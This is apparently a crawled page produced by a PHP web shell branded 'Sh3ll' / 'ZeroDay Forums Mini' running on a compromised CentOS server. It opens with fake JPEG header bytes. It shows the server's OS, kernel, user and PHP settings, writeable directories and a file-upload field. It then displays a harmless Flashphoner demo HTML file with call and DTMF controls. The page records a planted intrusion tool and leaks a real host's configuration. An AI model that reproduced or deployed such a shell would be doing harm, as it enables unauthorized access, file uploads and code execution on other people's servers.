����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /usr/local/FlashphonerWebCallServer/client/examples/demo/sip-as-rtmp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/local/FlashphonerWebCallServer/client/examples/demo/sip-as-rtmp/call-controls.html
<div class="row">
    <div class="col-lg-6 col-sm-offset-3 text-center">

        <div class="input-group row-space">
            <input id="callee" type="text" class="form-control" placeholder="callee"/>
            <span class="input-group-btn">
                <button id="callBtn" class="btn btn-success" style="width: 100px">Call</button>
            </span>
        </div>

        <div class="input-group row-space" style="margin-top: 20px">
            <input id="dtmf" type="text" class="form-control" placeholder="12345#">
            <span class="input-group-btn">
                <button id="dtmfBtn" class="btn btn-default" onclick="sendDTMF($('#dtmf').val())" style="width: 100px;">Send DTMF</button>
            </span>
        </div>

    </div>
</div>

<div class="row">
    <div class="col-lg-12" style="margin-top: 20px">
        <span id="callTrace" class="bg-warning"></span>
        <div id="callStatus" style="margin-top: 20px"></div>
    </div>
</div>

ZeroDay Forums Mini